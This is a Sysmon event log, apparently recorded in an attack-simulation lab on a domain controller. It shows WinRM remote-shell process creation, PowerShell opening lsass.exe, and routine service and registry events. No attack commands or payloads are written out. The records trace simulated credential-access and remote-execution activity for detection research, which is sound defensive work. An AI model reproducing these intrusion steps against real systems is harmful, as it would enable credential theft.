10341000x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.790{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.790{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-851D-5FCF-E402-000000009001}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.790{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-851D-5FCF-E402-000000009001}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.804{10ACEC4A-851D-5FCF-E402-000000009001}4496C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-851D-5FCF-E529-110000000000}0x1129e50HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-83B9-5FCF-0C00-000000009001}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.790{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.790{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.790{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:30.398{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:30.398{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:30.398{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:52:30.390{10ACEC4A-83B9-5FCF-1000-000000009001}1168C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000000) 13241300x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:52:30.386{10ACEC4A-83B9-5FCF-1100-000000009001}1224C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:52:30.386{10ACEC4A-83B9-5FCF-1100-000000009001}1224C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 10341000x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:30.118{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:30.118{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:30.118{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:30.024{10ACEC4A-84B9-5FCF-6700-000000009001}26843716C:\Windows\servicing\TrustedInstaller.exe{10ACEC4A-84B9-5FCF-6800-000000009001}3388C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eb98|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.889{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3B00-000000009101}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.889{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3B00-000000009101}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 